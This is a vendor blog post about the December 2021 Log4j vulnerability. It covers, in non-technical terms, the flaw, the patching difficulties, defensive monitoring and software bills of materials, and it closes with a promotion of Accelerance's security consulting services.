If cybersecurity specialists thought they could ease quietly into the holiday season, they were sadly mistaken.
Since Saturday, most of them have been working overtime to assess the impact of the Log4j logging tool vulnerability, which is widely considered to be the most serious exploit identified within the last decade at least.
This high-profile threat is rated at the top-most severity level. It works through a remote-code flaw in the Java library that logs error messages in applications, creating the potential for the Java-based logging utility, developed by Apache as part of an open-source software project, to allow malicious code to be executed in web apps. In some cases, Log4j could grant unauthorized access to vulnerable systems with breathtaking simplicity.
The ubiquitous nature of this tool, which is designed to create orderly logs in Java-based web applications to monitor their performance and security, means the scale of the threat is hard to quantify.
But a vast number of vendor systems are affected. Everything from internet routers to online banking services employ Java-based web apps and this logging tool may be embedded in them.
When Microsoft discovers a zero-day exploit, its security team scrambles to develop a patch and quickly fires it out to users across the globe. It can then be easily integrated into the affected software product to close the security hole.
In this case, it's a bit more complicated. While Apache has issued a patch to Log4j that addresses the exploit, as have many vendors who also use it, applying the fix to such a wide selection of affected web apps will take months, or even years. A second vulnerability not addressed by the patch was found on Tuesday.
Many Java apps were developed 10 to 15 years ago, and they have been ticking along in the background. Just identifying which apps employing Log4j are affected will be a major undertaking for many organizations. Due to their bespoke nature, some of these apps will have to be rebuilt to some extent, requiring a process of development and testing just as people are thinking about their holiday break.
While that task gets underway, network security professionals all over the world will be fixated on their systems, scanning for abnormal activity, such as account creation, lateral movement and privilege escalation, that suggests someone is trying to access parts of the system beyond that affected web app. Some organizations have just made the call to shut down the server hosting web apps with Log4j to be on the safe side while they audit their systems.
This exploit has really highlighted the importance of generating a software bill of materials, which lists all of the components of a piece of software, for future business resilience. That way, its users can quickly identify whether they need to move to isolate items for security purposes in an event like this.
The weeks ahead will be a stressful time for those organizations that are affected. Security researchers are already seeing attackers attempting to exploit the vulnerability.
We could well see an escalation in ransomware attacks as Log4j is used to inject malware into servers. State-sponsored hackers may already be using it to extract sensitive information as well.
The bottom line is that there's no room for complacency here. This is a critical vulnerability, and action can't be deferred. An experienced security expert can help identify, contain or protect against the threat. Accelerance's on-demand cybersecurity professionals are ready to assist our clients in assessing their position in relation to Log4j and, where necessary, helping them take mitigating actions.
As trusted advisors, they provide recommendations to modify or rebuild web apps where necessary. This exploit poses a threat that affects organizations big and small, all over the world. By being vigilant and helping our partners and customers, we can make sure the potential for damage is minimized.